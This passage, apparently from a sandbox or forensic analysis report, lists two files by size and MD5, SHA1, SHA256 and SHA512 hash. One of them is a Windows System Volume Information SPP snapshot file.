SHA51285e0705bf2361e75ae2016c9417f95169007db950db8839ceb78fd504d89c9beedd92ee029f9f849602973534ca24d805e5ff1d34fdb31a50266ade6b526b989
-
Filesize
23.0MB
MD5fa3ac602f2f47b5777a0dbe499aca84a
SHA15c4eaa52663c0c585c443d9578f69655c69021ae
SHA2565fc19a08e881d87d2753a1dc5296e289202b2a26d043df1ffcdabb75e35356fe
SHA51216d75ae82c73d23fe26080e1aa0d539064506657599617a6ffb116cf006d34ebb3956ac55a76424fe9b3dd3d82ce2c8c8b9c7abb0d8f05f258603a7860cae0ba
-
\??\Volume{99926f1d-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{3251f9fe-c41c-44ff-9f39-fa45ea787a34}_OnDiskSnapshotProp
Filesize5KB
MD53a011f876c8430e2f035c58573ab7e9f
SHA1fbc61c4117d0ec02e18221d0dbfea8d747248955
SHA256c315b0f559e0a5fec75fa91ec1f8b14e1b0094bad949344b8b8c47907790fb08
SHA512ebc4b4a1e997d202aaabdf001b8b47d5700912b4c2562ec03d2a79bcb91d6ac07f45db67f04cf49d6c59a802e3e5cb94fd07347b2d5d462b1afe17bde7a3f207